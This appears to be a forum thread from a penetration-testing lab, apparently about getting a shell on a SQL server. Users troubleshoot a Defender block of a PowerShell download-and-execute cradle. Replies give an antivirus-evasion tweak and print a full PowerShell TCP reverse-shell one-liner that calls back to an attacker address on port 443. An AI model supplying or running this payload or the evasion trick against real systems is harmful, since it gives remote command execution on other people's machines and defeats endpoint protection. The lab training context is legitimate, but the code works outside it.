This script contains malicious content and has been blocked by your antivirus software.
At line:1 char:1
IEX (New-Object Net.WebClient).DownloadString("http:// ip /she …
+ CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
I throw this error when loading the shell on the sql server, someone also came out and solved it already?
Hello,
I had the issue because I was using a powershell from github (copy/paste failed into my VM…) And the solution was on commentsl:
if you want to evade Defender, you can replace "PS " + (pwd).Path + "> " with “#”
source: powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok · GitHub
However, the script provided on the tutorial does contain the # so you may check that part on your reverse shell
Regards
The official tutorial contains a typo. There is "# " and it has to be “#” without a space
$client=New-ObjectSystem.Net.Sockets.TCPClient(“<Your_IP>”,443);$stream=$client.GetStream();[byte]$bytes=0…65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length))-ne0){;$data=(New-Object-TypeNameSystem.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex$data2>&1|Out-String);$sendback2=$sendback+“#”;$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()